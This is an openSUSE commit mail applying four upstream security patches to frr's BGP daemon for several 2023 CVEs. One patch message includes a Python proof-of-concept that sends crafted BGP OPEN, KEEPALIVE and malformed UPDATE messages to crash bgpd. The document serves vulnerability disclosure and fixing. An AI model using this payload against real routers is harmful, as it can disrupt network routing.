Script 'mail_helper' called by obssrc Hello community, here is the log from the commit of package frr for openSUSE:Factory checked in at 2023-12-05 17:04:21 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Comparing /work/SRC/openSUSE:Factory/frr (Old) and /work/SRC/openSUSE:Factory/.frr.new.25432 (New) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Package is "frr" Tue Dec 5 17:04:21 2023 rev:28 rq:1130955 version:8.4 Changes: -------- --- /work/SRC/openSUSE:Factory/frr/frr.changes 2023-10-31 20:26:45.176261043 +0100 +++ /work/SRC/openSUSE:Factory/.frr.new.25432/frr.changes 2023-12-05 17:04:43.368479613 +0100 @@ -1,0 +2,18 @@ +Mon Dec 4 09:11:46 UTC 2023 - Marius Tomaschewski <[email protected]> + +- Apply upstream fix for a crash on malformed BGP UPDATE message + with an EOR, because the presence of EOR does not lead to a + treat-as-withdraw outcome (CVE-2023-47235,1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b) + [+ 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch] +- Apply upstream fix for a crash on crafted BGP UPDATE message with + a MP_UNREACH_NLRI attribute and additional NLRI data (CVE-2023-47234, + bsc#1216897,ttps://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf) + [+ 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch] +- Apply upstream fix for attempts to read beyond the end of the + stream during labeled unicast parsing (CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f) + [+ 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch] +- Apply upstream fix for an nlri length of zero mishandling, aka + "flowspec overflow" (CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3) + [+ 0018-bgpd-Flowspec-overflow-issue.patch] + +------------------------------------------------------------------- New: ---- 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch 0018-bgpd-Flowspec-overflow-issue.patch BETA DEBUG BEGIN: New: treat-as-withdraw outcome (CVE-2023-47235,1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b) [+ 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch] - Apply upstream fix for a crash on crafted BGP UPDATE message with New: bsc#1216897,ttps://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf) [+ 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch] - Apply upstream fix for attempts to read beyond the end of the New: stream during labeled unicast parsing (CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f) [+ 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch] - Apply upstream fix for an nlri length of zero mishandling, aka New: "flowspec overflow" (CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3) [+ 0018-bgpd-Flowspec-overflow-issue.patch] BETA DEBUG END: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Other differences: ------------------ ++++++ frr.spec ++++++ --- /var/tmp/diff_new_pack.nGs4G5/_old 2023-12-05 17:04:44.388517212 +0100 +++ /var/tmp/diff_new_pack.nGs4G5/_new 2023-12-05 17:04:44.388517212 +0100 @@ -53,6 +53,10 @@ Patch12: 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch Patch13: 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch Patch14: 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch +Patch15: 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch +Patch16: 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch +Patch17: 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch +Patch18: 0018-bgpd-Flowspec-overflow-issue.patch BuildRequires: autoconf BuildRequires: automake BuildRequires: bison >= 2.7 @@ -204,6 +208,10 @@ %patch12 -p1 %patch13 -p1 %patch14 -p1 +%patch15 -p1 +%patch16 -p1 +%patch17 -p1 +%patch18 -p1 %build # GCC LTO objects must be "fat" to avoid assembly errors ++++++ 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch ++++++ >From fcd12ca92baf2be4b191ddc3d3021c276c635930 Mon Sep 17 00:00:00 2001 From: Donatas Abraitis <[email protected]> Date: Fri, 27 Oct 2023 11:56:45 +0300 Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of malformed attrs Upstream: yes CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be processed as a normal UPDATE without mandatory attributes, that could lead to harmful behavior. In this case, a crash for route-maps with the configuration such as: ``` router bgp 65001 no bgp ebgp-requires-policy neighbor 127.0.0.1 remote-as external neighbor 127.0.0.1 passive neighbor 127.0.0.1 ebgp-multihop neighbor 127.0.0.1 disable-connected-check neighbor 127.0.0.1 update-source 127.0.0.2 neighbor 127.0.0.1 timers 3 90 neighbor 127.0.0.1 timers connect 1 ! address-family ipv4 unicast neighbor 127.0.0.1 addpath-tx-all-paths neighbor 127.0.0.1 default-originate neighbor 127.0.0.1 route-map RM_IN in exit-address-family exit ! route-map RM_IN permit 10 set as-path prepend 200 exit ``` Send a malformed optional transitive attribute: ``` import socket import time OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" b"\x80\x00\x00\x00") KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.2', 179)) s.send(OPEN) data = s.recv(1024) s.send(KEEPALIVE) data = s.recv(1024) s.send(UPDATE) data = s.recv(1024) time.sleep(100) s.close() ``` Reported-by: Iggy Frankovic <[email protected]> Signed-off-by: Donatas Abraitis <[email protected]> Signed-off-by: Marius Tomaschewski <[email protected]> diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c index 42a2342f6f..fc92dbb326 100644 --- a/bgpd/bgp_attr.c +++ b/bgpd/bgp_attr.c @@ -3104,10 +3104,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, uint8_t type = 0; /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an - * empty UPDATE. */ + * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it, + * we will pass it to be processed as a normal UPDATE without mandatory + * attributes, that could lead to harmful behavior. + */ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && !length) - return BGP_ATTR_PARSE_PROCEED; + return BGP_ATTR_PARSE_WITHDRAW; /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required to carry any other path attributes.", though if MP_REACH_NLRI or NLRI @@ -3532,7 +3535,13 @@ done: aspath_unintern(&as4_path); transit = bgp_attr_get_transit(attr); - if (ret != BGP_ATTR_PARSE_ERROR) { + /* If we received an UPDATE with mandatory attributes, then + * the unrecognized transitive optional attribute of that + * path MUST be passed. Otherwise, it's an error, and from + * security perspective it might be very harmful if we continue + * here with the unrecognized attributes. + */ + if (ret == BGP_ATTR_PARSE_PROCEED) { /* Finally intern unknown attribute. */ if (transit) bgp_attr_set_transit(attr, transit_intern(transit)); -- 2.35.3 ++++++ 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch ++++++ >From 4e39893cfb2d4dbc13fa6d6a25bbf623ed14a4fb Mon Sep 17 00:00:00 2001 From: Donatas Abraitis <[email protected]> Date: Sun, 29 Oct 2023 22:44:45 +0200 Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI Upstream: yes CVE-2023-47234,bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if no mandatory path attributes received. In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled as a new data, but without mandatory attributes, it's a malformed packet. In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST handle that. Reported-by: Iggy Frankovic <[email protected]> Signed-off-by: Donatas Abraitis <[email protected]> Signed-off-by: Marius Tomaschewski <[email protected]> diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c index fc92dbb326..ae0f052c42 100644 --- a/bgpd/bgp_attr.c +++ b/bgpd/bgp_attr.c @@ -3112,15 +3112,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, !length) return BGP_ATTR_PARSE_WITHDRAW; - /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required - to carry any other path attributes.", though if MP_REACH_NLRI or NLRI - are present, it should. Check for any other attribute being present - instead. - */ - if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && - CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))) - return BGP_ATTR_PARSE_PROCEED; - if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) type = BGP_ATTR_ORIGIN; @@ -3139,6 +3130,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF))) type = BGP_ATTR_LOCAL_PREF; + /* An UPDATE message that contains the MP_UNREACH_NLRI is not required + * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI + * are present, it should. Check for any other attribute being present + * instead. + */ + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && + CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))) + return type ? BGP_ATTR_PARSE_MISSING_MANDATORY + : BGP_ATTR_PARSE_PROCEED; + /* If any of the well-known mandatory attributes are not present * in an UPDATE message, then "treat-as-withdraw" MUST be used. */ diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h index 23767153b2..27708c0689 100644 --- a/bgpd/bgp_attr.h +++ b/bgpd/bgp_attr.h @@ -382,6 +382,7 @@ enum bgp_attr_parse_ret { /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR */ BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, + BGP_ATTR_PARSE_MISSING_MANDATORY = -4, }; struct bpacket_attr_vec_arr; diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c index 20c642190b..b175a26ab9 100644 --- a/bgpd/bgp_packet.c +++ b/bgpd/bgp_packet.c @@ -1951,7 +1951,12 @@ static int bgp_update_receive(struct peer *peer, bgp_size_t size) /* Network Layer Reachability Information. */ update_len = end - stream_pnt(s); - if (update_len && attribute_len) { + /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then + * NLRIs should be handled as a new data. Though, if we received + * NLRIs without mandatory attributes, they should be ignored. + */ + if (update_len && attribute_len && + attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) { /* Set NLRI portion to structure. */ nlris[NLRI_UPDATE].afi = AFI_IP; nlris[NLRI_UPDATE].safi = SAFI_UNICAST; -- 2.35.3 ++++++ 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch ++++++ >From 6979aa1574167121e260120504c77b47bb25230e Mon Sep 17 00:00:00 2001 From: Donald Sharp <[email protected]> Date: Fri, 3 Mar 2023 21:58:33 -0500 Subject: [PATCH] bgpd: Fix use beyond end of stream of labeled unicast parsing Upstream: yes CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f Fixes a couple crashes associated with attempting to read beyond the end of the stream. Reported-by: Iggy Frankovic <[email protected]> Signed-off-by: Donald Sharp <[email protected]> (cherry picked from commit 7404a914b0cafe046703c8381903a80d3def8f8b) Signed-off-by: Marius Tomaschewski <[email protected]> diff --git a/bgpd/bgp_label.c b/bgpd/bgp_label.c index 38f34a8927..64d1ff70ca 100644 --- a/bgpd/bgp_label.c +++ b/bgpd/bgp_label.c @@ -312,6 +312,9 @@ static int bgp_nlri_get_labels(struct peer *peer, uint8_t *pnt, uint8_t plen, uint8_t llen = 0; uint8_t label_depth = 0; + if (plen < BGP_LABEL_BYTES) + return 0; + for (; data < lim; data += BGP_LABEL_BYTES) { memcpy(label, data, BGP_LABEL_BYTES); llen += BGP_LABEL_BYTES; @@ -374,6 +377,9 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, memcpy(&addpath_id, pnt, BGP_ADDPATH_ID_LEN); addpath_id = ntohl(addpath_id); pnt += BGP_ADDPATH_ID_LEN; + + if (pnt >= lim) + return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; } /* Fetch prefix length. */ @@ -392,6 +398,15 @@ int bgp_nlri_parse_label(struct peer *peer, struct attr *attr, /* Fill in the labels */ llen = bgp_nlri_get_labels(peer, pnt, psize, &label); + if (llen == 0) { + flog_err( + EC_BGP_UPDATE_RCV, + "%s [Error] Update packet error (wrong label length 0)", + peer->host); + bgp_notify_send(peer, BGP_NOTIFY_UPDATE_ERR, + BGP_NOTIFY_UPDATE_INVAL_NETWORK); + return BGP_NLRI_PARSE_ERROR_LABEL_LENGTH; + } p.prefixlen = prefixlen - BSIZE(llen); /* There needs to be at least one label */ -- 2.35.3 ++++++ 0018-bgpd-Flowspec-overflow-issue.patch ++++++ >From d4ead6bc0b2f0d4682661837d202502127060476 Mon Sep 17 00:00:00 2001 From: Donald Sharp <[email protected]> Date: Thu, 23 Feb 2023 13:29:32 -0500 Subject: [PATCH] bgpd: Flowspec overflow issue Upstream: yes CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3 According to the flowspec RFC 8955 a flowspec nlri is <length, <nlri data>> Specifying 0 as a length makes BGP get all warm on the inside. Which in this case is not a good thing at all. Prevent warmth, stay cold on the inside. Reported-by: Iggy Frankovic <[email protected]> Signed-off-by: Donald Sharp <[email protected]> Signed-off-by: Marius Tomaschewski <[email protected]> diff --git a/bgpd/bgp_flowspec.c b/bgpd/bgp_flowspec.c index fe1f0d50f8..98ec1ed073 100644 --- a/bgpd/bgp_flowspec.c +++ b/bgpd/bgp_flowspec.c @@ -148,6 +148,13 @@ int bgp_nlri_parse_flowspec(struct peer *peer, struct attr *attr, psize); return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; } + + if (psize == 0) { + flog_err(EC_BGP_FLOWSPEC_PACKET, + "Flowspec NLRI length 0 which makes no sense"); + return BGP_NLRI_PARSE_ERROR_PACKET_OVERFLOW; + } + if (bgp_fs_nlri_validate(pnt, psize, afi) < 0) { flog_err( EC_BGP_FLOWSPEC_PACKET, -- 2.35.3
